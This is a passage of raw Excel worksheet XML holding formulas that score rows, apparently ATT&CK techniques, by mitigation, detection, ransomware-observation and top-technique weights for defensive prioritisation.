        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B535" s="25">
        <f>SUM(H535,M535,V535)*(1+SUM(AE535,AG535,AI535,AK535,AM535))</f>
        <v>0.05</v>
      </c>
      <c r="C535" s="25" t="s">
        <v>1882</v>
      </c>
      <c r="D535" s="25" t="s">
        <v>1881</v>
      </c>
      <c r="E535" s="25" t="s">
        <v>1883</v>
      </c>
      <c r="F535" s="51">
        <v>1</v>
      </c>
      <c r="G535" s="51">
        <v>0</v>
      </c>
      <c r="H535" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I535">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J535">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K535">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L535">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M535" s="25">
        <v>0</v>
      </c>
      <c r="N535" s="51">
        <v>0</v>
      </c>
      <c r="O535" s="51">
        <v>0</v>
      </c>
      <c r="P535" s="51">
        <v>0</v>
      </c>
      <c r="Q535" s="51">
        <v>0</v>
      </c>
      <c r="R535" s="51"/>
      <c r="S535" s="51">
        <v>0</v>
      </c>
      <c r="T535" s="51"/>
      <c r="U535" s="51">
        <v>0</v>
      </c>
      <c r="V535" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W535">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X535">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y535">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z535">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA535">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB535">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC535" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD535" s="25" t="str" cm="1">
        <f t="array" ref="AD535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE535" s="25">
        <f>IF(AD535="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF535" s="25" t="str" cm="1">
        <f t="array" ref="AF535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG535" s="25">
        <f>IF(AF535="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH535" s="25" t="str" cm="1">
        <f t="array" ref="AH535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI535" s="25">
        <f>IF(AH535="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ535" s="25" t="str" cm="1">
        <f t="array" ref="AJ535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK535" s="25">
        <f>IF(AJ535="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL535" s="25" t="str" cm="1">
        <f t="array" ref="AL535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM535" s="25">
        <f>IF(AL535="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN535" s="60">
        <v>1</v>
      </c>
      <c r="AO535" s="51">
        <v>1</v>
      </c>
      <c r="AP535" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ535" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR535" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS535" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT535" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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36" spans="1:47" ht="32.1">
      <c r="A536" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B536" s="25">
        <f>SUM(H536,M536,V536)*(1+SUM(AE536,AG536,AI536,AK536,AM536))</f>
        <v>0.05</v>
      </c>
      <c r="C536" s="25" t="s">
        <v>1884</v>
      </c>
      <c r="D536" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E536" s="25" t="s">
        <v>1885</v>
      </c>
      <c r="F536" s="51">
        <v>0</v>
      </c>
      <c r="G536" s="51">
        <v>1</v>
      </c>
      <c r="H536" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I536">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J536">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K536">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L536">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M536" s="25">
        <v>0</v>
      </c>
      <c r="N536" s="51">
        <v>0</v>
      </c>
      <c r="O536" s="51">
        <v>0</v>
      </c>
      <c r="P536" s="51">
        <v>0</v>
      </c>
      <c r="Q536" s="51">
        <v>0</v>
      </c>
      <c r="R536" s="51"/>
      <c r="S536" s="51">
        <v>0</v>
      </c>
      <c r="T536" s="51"/>
      <c r="U536" s="51">
        <v>0</v>
      </c>
      <c r="V536" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W536">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X536">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y536">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z536">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA536">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB536">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC536" s="29" t="s">
        <v>1886</v>
      </c>
      <c r="AD536" s="25" t="str" cm="1">
        <f t="array" ref="AD536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE536" s="25">
        <f>IF(AD536="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF536" s="25" t="str" cm="1">
        <f t="array" ref="AF536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC536)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG536" s="25">
        <f>IF(AF536="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH536" s="25" t="str" cm="1">
        <f t="array" ref="AH536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI536" s="25">
        <f>IF(AH536="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ536" s="25" t="str" cm="1">
        <f t="array" ref="AJ536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK536" s="25">
        <f>IF(AJ536="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL536" s="25" t="str" cm="1">
        <f t="array" ref="AL536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM536" s="25">
        <f>IF(AL536="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN536" s="60">
        <v>1</v>
      </c>
      <c r="AO536" s="51">
        <v>0</v>
      </c>
      <c r="AP536" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ536" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR536" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS536" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT536" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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37" spans="1:47" ht="32.1">
      <c r="A537" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B537" s="25">
        <f>SUM(H537,M537,V537)*(1+SUM(AE537,AG537,AI537,AK537,AM537))</f>
        <v>0.05</v>
      </c>
      <c r="C537" s="25" t="s">
        <v>1887</v>
      </c>
      <c r="D537" s="25" t="s">
        <v>1870</v>
      </c>
      <c r="E537" s="25" t="s">
        <v>1888</v>
      </c>
      <c r="F537" s="51">
        <v>0</v>
      </c>
      <c r="G537" s="51">
        <v>1</v>
      </c>
      <c r="H537" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I537">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J537">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K537">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L537">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M537" s="25">
        <v>0</v>
      </c>
      <c r="N537" s="51">
        <v>0</v>
      </c>
      <c r="O537" s="51">
        <v>0</v>
      </c>
      <c r="P537" s="51">
        <v>0</v>
      </c>
      <c r="Q537" s="51">
        <v>0</v>
      </c>
      <c r="R537" s="51"/>
      <c r="S537" s="51">
        <v>0</v>
      </c>
      <c r="T537" s="51"/>
      <c r="U537" s="51">
        <v>0</v>
      </c>
      <c r="V537" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W537">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X537">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y537">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z537">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA537">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB537">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC537" s="29" t="s">
        <v>1886</v>
      </c>
      <c r="AD537" s="25" t="str" cm="1">
        <f t="array" ref="AD537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE537" s="25">
        <f>IF(AD537="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF537" s="25" t="str" cm="1">
        <f t="array" ref="AF537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC537)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG537" s="25">
        <f>IF(AF537="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH537" s="25" t="str" cm="1">
        <f t="array" ref="AH537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI537" s="25">
        <f>IF(AH537="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ537" s="25" t="str" cm="1">
        <f t="array" ref="AJ537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK537" s="25">
        <f>IF(AJ537="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL537" s="25" t="str" cm="1">
        <f t="array" ref="AL537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM537" s="25">
        <f>IF(AL537="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN537" s="52">
        <v>1</v>
      </c>
      <c r="AO537" s="51">
        <v>0</v>
      </c>
      <c r="AP537" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ537" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR537" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS537" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT537" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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38" spans="1:47" ht="48">
      <c r="A538" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="B538" s="25">
        <f>SUM(H538,M538,V538)*(1+SUM(AE538,AG538,AI538,AK538,AM538))</f>
        <v>5.6600000000000011E-2</v>
      </c>
      <c r="C538" s="25" t="s">
        <v>1889</v>
      </c>
      <c r="D538" s="25" t="s">
        <v>1867</v>
      </c>
      <c r="E538" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F538" s="51">
        <v>0</v>
      </c>
      <c r="G538" s="51">
        <v>1</v>
      </c>
      <c r="H538" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I538">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J538">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K538">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L538">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M538" s="25">
        <v>0</v>
      </c>
      <c r="N538" s="51">
        <v>0</v>
      </c>
      <c r="O538" s="51">
        <v>0</v>
      </c>
      <c r="P538" s="51">
        <v>0</v>
      </c>
      <c r="Q538" s="51">
        <v>0</v>
      </c>
      <c r="R538" s="51"/>
      <c r="S538" s="51">
        <v>0</v>
      </c>
      <c r="T538" s="51"/>
      <c r="U538" s="51">
        <v>0</v>
      </c>
      <c r="V538" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W538">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X538">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y538">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z538">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA538">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB538">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC538" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD538" s="25" t="str" cm="1">
        <f t="array" ref="AD538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE538" s="25">
        <f>IF(AD538="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF538" s="25" t="str" cm="1">
        <f t="array" ref="AF538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC538)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG538" s="25">
        <f>IF(AF538="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH538" s="25" t="str" cm="1">
        <f t="array" ref="AH538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC538)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI538" s="25">
        <f>IF(AH538="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ538" s="25" t="str" cm="1">
        <f t="array" ref="AJ538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK538" s="25">
        <f>IF(AJ538="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL538" s="25" t="str" cm="1">
        <f t="array" ref="AL538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM538" s="25">
        <f>IF(AL538="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN538" s="52">
        <v>0</v>
      </c>
      <c r="AO538" s="51">
        <v>0</v>
      </c>
      <c r="AP538" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.660000000000001E-3</v>
      </c>
      <c r="AQ538" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AR538" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.886666666666667E-2</v>
      </c>
      <c r="AS538" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT538" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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39" spans="1:47" ht="48">
      <c r="A539" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6500000000000005E-3</v>
      </c>
      <c r="B539" s="25">
        <f>SUM(H539,M539,V539)*(1+SUM(AE539,AG539,AI539,AK539,AM539))</f>
        <v>6.6500000000000004E-2</v>
      </c>
      <c r="C539" s="25" t="s">
        <v>1890</v>
      </c>
      <c r="D539" s="25" t="s">
        <v>1891</v>
      </c>
      <c r="E539" s="25" t="s">
        <v>1892</v>
      </c>
      <c r="F539" s="51">
        <v>0</v>
      </c>
      <c r="G539" s="51">
        <v>1</v>
      </c>
      <c r="H539" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I539">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J539">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K539">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L539">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M539" s="25">
        <v>0</v>
      </c>
      <c r="N539" s="51">
        <v>0</v>
      </c>
      <c r="O539" s="51">
        <v>0</v>
      </c>
      <c r="P539" s="51">
        <v>0</v>
      </c>
      <c r="Q539" s="51">
        <v>0</v>
      </c>
      <c r="R539" s="51"/>
      <c r="S539" s="51">
        <v>0</v>
      </c>
      <c r="T539" s="51"/>
      <c r="U539" s="51">
        <v>0</v>
      </c>
      <c r="V539" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W539">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X539">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y539">
